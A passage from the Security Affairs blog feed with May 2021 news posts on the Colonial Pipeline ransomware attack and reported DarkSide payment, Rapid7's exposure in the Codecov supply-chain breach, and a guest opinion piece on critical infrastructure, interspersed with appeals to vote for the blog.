Please vote Security Affairs as Best Personal cybersecurity Blog
https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Ireland Health Service Executive)

The post Ireland’s Health Service Executive hit by ransomware attack appeared first on Security Affairs.

Colonial Pipeline likely paid a $5M ransom to DarkSide

14 May 2021 at 10:13

DarkSide demanded a $5 million ransom to Colonial Pipeline, which has quickly recovered operations, did it pay?

The Colonial Pipeline facility in Pelham, Alabama, was hit by a cybersecurity attack on Friday and its operators were forced to shut down its systems. The pipeline allows carrying 2.5 million barrels of refined gasoline and jet fuel each day up the East Coast from Texas to New York, it covers 45 percent of the East Coast’s fuel supplies.

“The operator of the system, Colonial Pipeline, said in a statement late Friday that it had shut down its 5,500 miles of pipeline, which it says carries 45 percent of the East Coast’s fuel supplies, in an effort to contain the breach on its computer networks. Earlier Friday, there were disruptions along the pipeline, but it was unclear whether that was a direct result of the attack.” reported The New York Times.

Early this week, the U.S. Federal Bureau of Investigation confirmed that the Colonial Pipeline was shut down due to a cyber attack carried out by the Darkside ransomware gang.

The pipeline allows carrying 2.5 million barrels of refined gasoline and jet fuel each day up the East Coast from Texas to New York, it covers 45 percent of the East Coast’s fuel supplies.

Colonial Pipeline has recovered quickly from the ransomware attack, all its infrastructure has been restarted today.

Colonial Pipeline can now report that we have restarted our entire pipeline system and that product delivery has commenced to all markets we serve. https://t.co/kpWNw0UQve pic.twitter.com/9r5hA2CLNn

— Colonial Pipeline (@Colpipe) May 13, 2021

Multiple media, citing people familiar with the matter, reported that the company had initially refused to pay the ransom.

However, the quick restoration of the operations is suspicious and suggests that the operators of the Colonial Pipeline have paid the ransom.

The New York Rime reported that Colonial Pipeline paid the hackers almost $5 million worth of cryptocurrency to receive a decryption key that allowed it to restore the encrypted files. Because the tool was too slow, the company used its backups to restore the systems.

“The operator of a critical fuel pipeline on the East Coast paid extortionists roughly 75 Bitcoin — or nearly $5 million — to recover its stolen data, according to people briefed on the transaction, clearing the way for gas to begin flowing again but complicating President Biden’s efforts to deter future attacks.” reported the NYT.

“Colonial Pipeline made the ransom payment to the hacking group DarkSide after the cybercriminals last week held up the company’s business networks with ransomware, a form of malware that encrypts data until the victim pays, and threatened to release it online.”

According to the media, once the company has obtained the decryption key used it along with its backup system to quickly restore the impacted systems and resume pipeline operations.

Please vote Security Affairs as Best Personal Blog
https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Colonial Pipeline)

The post Colonial Pipeline likely paid a $5M ransom to DarkSide appeared first on Security Affairs.

Rapid7 says source code, credentials accessed as a result of Codecov supply-chain attack

14 May 2021 at 06:19

Rapid7 disclosed that unauthorized third-party had access to source code and customer data as result of Codecov supply chain attack.

Cyber security vendor Rapid7 reveals it was impacted by the Codecov software supply chain attack, attackers had access to data for part of its customers and a small subset of its source code repositories for internal tools.

In April, the software company Codecov disclosed a major security breach after a threat actor compromised its infrastructure to inject a credentials harvester code to one of its tools named Bash Uploader.

The threat actor gained periodic access to the Bash Uploader script making changes to add malicious code. The malicious code would allow the attacker to intercept uploads and scan and collect any sensitive information, including credentials, tokens, or keys.

Code coverage is one of the major metrics companies, it provides code testing solutions to a broad range of organizations, including Atlassian, P&G, GoDaddy, and the Washington Post.

The security breach took place on January 31, but it was discovered on April 1st by one of its customers.

Shortly after the disclosure of the Codecov supply chain attack, the company launched an internal investigation to determine the potential impact on its infrastructure. The experts discovered that:

  • A small subset of our source code repositories for internal tooling for our MDR service was accessed by an unauthorized party outside of Rapid7
  • These repositories contained some internal credentials, which have all been rotated, and alert-related data for a subset of our MDR customers
  • No other corporate systems or production environments were accessed, and no unauthorized changes to these repositories were made

The repositories accessed by third-party contained internal credentials and alert-related data for a subset of its MDR (managed detection and response) customers. In response to the breach, the company reset the impacted credentials.

“We will update this notice if we learn new information that changes the scope of the impact described here. If you are a customer and have any questions or need further information, please contact your Account Team or email [email protected]” concludes Rapid7.

Please vote Security Affairs as Best Personal Blog
https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, supply chain attack)

The post Rapid7 says source code, credentials accessed as a result of Codecov supply-chain attack appeared first on Security Affairs.

Security at Bay: Critical Infrastructure Under Attack

13 May 2021 at 20:16

The recent Colonial Pipeline attack highlights the dangers that are facing Critical Infrastructure worldwide.

The attack perpetrated by hackers on oil company Colonial Pipeline highlights the dangers that are facing Industrial Control Systems (ICS) and the need for change in the information security landscape,

The attack took place on May 7th where hackers used ransomware to cripple the defense of the company. As a result, all operations were forced to shut down as well as operating systems used by the company. A group named DarkSide claimed to be responsible for Colonial Pipelines attack.

The hacker group is active since august and are part of a professional crime industry that have caused damage of billions of dollars. President Biden has delivery remarks that point out to the involvement of Russia in the development of the ransomware. It is not clear if the Colonial company has paid the demands.

The attack brought to light how critical national infrastructure (CNI) is vulnerable and the need of new methodologies to address new menaces that are evolving on a daily basis on many different ways. As far as we know this attack have proved that the understanding of information security has become outdated as well the solutions that were supposed to protect companies assets.

The impact of the attack was far beyond then expected. Consumers were directely impacted with a hike on prices. Also, in South east some drivers started to stocking up as available oil dropped down in fuel stations. About 5,500 miles of pipeline were shutdown. To figure it out in numbers it represents 45% of fuel comsumed from texas to new york.

As reported by Recorded Future ransomware attack groups are gainning momentum and wide spreading throughout every and all sector. From industry to education everyone is on target of ransomware. It is importante to notice that hackers are publishing part of the data and demanding money to do not publish all the data stolen.

While the United States leads the attack of ransomware hackers are aiming to make other countries victims. Freedom and security are deeply rooted in the american dream, but today all the nation see this rights going down with the dangers of information security.

The US Department of Justice and a group of companies have created a task force to manage the issue of ransomware threat. However, the tools that were released by equation group in the past can be the tipping point to new attacks or development of new ways to bypass known protections.

Little is known yet how the company was breached but it was certanly that the goal was to obtain money instead of corrupting the system. Some parts of the system were restored and the company said it will update their systems. Part of operations are manual at this time but its not sure when the supplies will return to normal.

The question now is if the available supplies will be enough. The disruption of the supplies could lead to an impact on many sectors. Bitdefender released a decryption tool on january for an older version of the ransomware, but they said that for this new version the tool do not work. According to Bloomberg 100GB was stolen in just two hours. This is a remarkable event to be considered as the largest and successful act of cyberwarfare.

Finally we need to develop new systems and new tecnologies as this could be the starting of a surge of new threat actors and new attacks that can not be stopped by the actual protection solutions.  

Sources:

https://therecord.media/ransomware-tracker-threat-groups-focus-on-vulnerable-targets/

https://www.zdnet.com/article/colonial-pipeline-ransomware-attack-everything-you-need-to-know/

https://www.bbc.com/news/business-57081386

https://www.bbc.com/news/business-57050690

https://www.computerweekly.com/news/252500508/Colonial-Pipeline-ransomware-attack-has-grave-consequences

https://www.databreachtoday.com/colonial-pipeline-attack-all-monsters-are-human-a-16568

https://www.cbsnews.com/news/colonial-pipeline-ransomware-attack-darkside-criminal-gang/

https://www.bloomberg.com/news/articles/2021-05-09/colonial-hackers-stole-data-thursday-ahead-of-pipeline-shutdown

Please vote Security Affairs as Best Personal cybersecurity Blog
https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform

About the author Luis Nakamoto_

Luis Nakamoto is a Computer Science student of Cryptology and an enthusiastic of information security having participated in groups like Comissão Especial de Direito Digital e Compliance (OAB/SP) and CCBS (Consciência Cibernética Brasil) as a researcher in new technologies related to ethical hacking, forensics and reverse
engineering. Also, a prolific and compulsive writer participating as a Redactor to Portal Tic from Sebrae Nacional.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Critical Infrastructure)

The post Security at Bay: Critical Infrastructure Under Attack appeared first on Security Affairs.

Please vote Security Affairs – 1 day left

13 May 2021 at 18:38

Hi Guys
I need your support. I became aware only not that we can nominate SecurityAffairs as Best Personal Blog.

I need your support. Please vote Security Affairs as Best Personal cybersecurity Blog at the following link

https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform

The URL is https://securityaffairs.co/

and indicate me Pierluigi Paganini as reference

Thank you!
Pierluigi

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking)

The post Please vote Security Affairs – 1 day left appeared first on Security Affairs.

❌